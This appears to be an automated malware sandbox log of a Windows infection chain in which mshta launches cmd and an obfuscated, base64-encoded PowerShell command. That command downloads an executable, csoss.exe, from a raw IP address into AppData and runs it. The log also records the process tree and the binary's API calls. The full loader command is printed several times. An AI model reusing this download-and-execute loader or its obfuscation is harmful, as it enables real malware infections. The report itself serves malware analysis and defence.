                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csoss.exe "C:\Users\user\AppData\Roaming\csoss.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5CF.tmp" "c:\Users\user\AppData\Local\Temp\43swuu3x\CSC1706E7A7601C443B9125CD5A3AB1B1B7.TMP"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csoss.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jedhicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqwrklxrzugugicagicagicagicagicagicagicagicagicagicagicaglw1ltujlcmrfrmlosxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvyte1vbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagz1draxbnredkcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagamdrlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbfaxpjtuh2dkjalhvpbnqgicagicagicagicagicagicagicagicagicagicagicagcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagrsk7jyagicagicagicagicagicagicagicagicagicagicagicatbkftrsagicagicagicagicagicagicagicagicagicagicagicaivedorg9hcunlryigicagicagicagicagicagicagicagicagicagicagicaglu5btuvtuefjrsagicagicagicagicagicagicagicagicagicagicagicbwr1zhbyagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrhyto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yoc8xmjavy3nvc3muzxhliiwijevodjpbufbeqvrbxgnzb3nzlmv4zsismcwwkttzvgfyvc1zbevfccgzkttjblzvs0utaxrftsagicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxgnzb3nzlmv4zsi='+[char]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jedhicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqwrklxrzugugicagicagicagicagicagicagicagicagicagicagicaglw1ltujlcmrfrmlosxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvyte1vbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagz1draxbnredkcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagamdrlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbfaxpjtuh2dkjalhvpbnqgicagicagicagicagicagicagicagicagicagicagicagcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagrsk7jyagicagicagicagicagicagicagicagicagicagicagicatbkftrsagicagicagicagicagicagicagicagicagicagicagicaivedorg9hcunlryigicagicagicagicagicagicagicagicagicagicagicaglu5btuvtuefjrsagicagicagicagicagicagicagicagicagicagicagicbwr1zhbyagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrhyto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yoc8xmjavy3nvc3muzxhliiwijevodjpbufbeqvrbxgnzb3nzlmv4zsismcwwkttzvgfyvc1zbevfccgzkttjblzvs0utaxrftsagicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxgnzb3nzlmv4zsi='+[char]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jedhicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqwrklxrzugugicagicagicagicagicagicagicagicagicagicagicaglw1ltujlcmrfrmlosxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvyte1vbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagz1draxbnredkcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagamdrlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbfaxpjtuh2dkjalhvpbnqgicagicagicagicagicagicagicagicagicagicagicagcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagrsk7jyagicagicagicagicagicagicagicagicagicagicagicatbkftrsagicagicagicagicagicagicagicagicagicagicagicaivedorg9hcunlryigicagicagicagicagicagicagicagicagicagicagicaglu5btuvtuefjrsagicagicagicagicagicagicagicagicagicagicagicbwr1zhbyagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrhyto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yoc8xmjavy3nvc3muzxhliiwijevodjpbufbeqvrbxgnzb3nzlmv4zsismcwwkttzvgfyvc1zbevfccgzkttjblzvs0utaxrftsagicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxgnzb3nzlmv4zsi='+[char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jedhicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqwrklxrzugugicagicagicagicagicagicagicagicagicagicagicaglw1ltujlcmrfrmlosxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvyte1vbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagz1draxbnredkcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagamdrlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbfaxpjtuh2dkjalhvpbnqgicagicagicagicagicagicagicagicagicagicagicagcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagrsk7jyagicagicagicagicagicagicagicagicagicagicagicatbkftrsagicagicagicagicagicagicagicagicagicagicagicaivedorg9hcunlryigicagicagicagicagicagicagicagicagicagicagicaglu5btuvtuefjrsagicagicagicagicagicagicagicagicagicagicagicbwr1zhbyagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrhyto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yoc8xmjavy3nvc3muzxhliiwijevodjpbufbeqvrbxgnzb3nzlmv4zsismcwwkttzvgfyvc1zbevfccgzkttjblzvs0utaxrftsagicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxgnzb3nzlmv4zsi='+[char]0x22+'))')))"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D57CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,6_2_00D57CAF
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D5874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,6_2_00D5874B
                    Source: csoss.exe, 00000006.00000000.1384714838.0000000000DB4000.00000002.00000001.01000000.0000000A.sdmp, csoss.exe.3.dr, csoss[1].exe.3.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: csoss.exeBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D2862B cpuid 6_2_00D2862B
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
